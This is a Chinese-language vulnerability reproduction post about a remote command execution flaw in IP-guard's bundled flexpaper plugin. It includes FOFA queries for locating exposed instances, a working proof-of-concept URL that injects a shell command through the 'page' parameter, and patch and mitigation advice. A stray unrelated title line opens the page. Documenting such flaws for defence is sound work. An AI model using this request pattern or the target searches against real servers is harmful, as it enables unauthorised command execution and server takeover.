ui設(shè)計和網(wǎng)站開發(fā)官方網(wǎng)站營銷
簡介
IP-guard是一款終端安全管理軟件,旨在幫助企業(yè)保護終端設(shè)備安全、數(shù)據(jù)安全、管理網(wǎng)絡(luò)使用和簡化IT系統(tǒng)管理。在舊版本申請審批的文件預(yù)覽功能用到了一個開源的插件 flexpaper,使用的這個插件版本存在遠程命令執(zhí)行漏洞,攻擊者可利用該漏洞執(zhí)行任意命令,獲取服務(wù)器控制權(quán)限。
影響版本:IP-guard<4.81.0307.0
漏洞復(fù)現(xiàn)
FOFA語法:
app="IP-guard"
或者
web.title="IP-guard"
訪問頁面如下所示:
POC:
/ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+test+>test.txt
拼接URL進行g(shù)et請求:
http://ip:port/ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+test+>test.txt
從瀏覽器訪問后會直接下載一個文件證明請求成功
訪問POC:/ipg/static/appr/lib/flexpaper/php/test.txt
成功執(zhí)行寫入的命令
攻擊者可以利用漏洞獲取對服務(wù)器的控制權(quán)
修復(fù)建議
1、產(chǎn)品升級方案
官方已發(fā)布新版本修復(fù)漏洞,建議盡快訪問官網(wǎng)(https://www.ip-guard.net/)或聯(lián)系官方售后支持獲取版本升級安裝包或補丁,升級至4.81.0307.0及以上。
2、臨時緩解措施
- 配置入侵檢測系統(tǒng)(IDS)和入侵防御系統(tǒng)(IPS)以及Web應(yīng)用防火墻(WAF),以識別和阻止這類特征的請求,從而保護系統(tǒng)免受此類遠程命令執(zhí)行攻擊的影響;同時為了避免攻擊者繞過安全設(shè)備實施攻擊,建議盡快修復(fù)漏洞。
- 如非必要,不要將 IP-guard 放置在公網(wǎng)上?;蛲ㄟ^網(wǎng)絡(luò)ACL策略限制訪問來源,例如只允許來自特定IP地址或地址段的訪問請求。
免責(zé)聲明
文章僅做經(jīng)驗分享用途,切勿當(dāng)真,未授權(quán)的攻擊屬于非法行為!利用本文章所提供的信息而造成的任何直接或者間接的后果及損失,均由使用者本人負責(zé),作者不為此承擔(dān)任何責(zé)任,一旦造成后果請自行承擔(dān)!!!
結(jié)語
沒有人規(guī)定,一朵花一定要成長為向日葵或者玫瑰。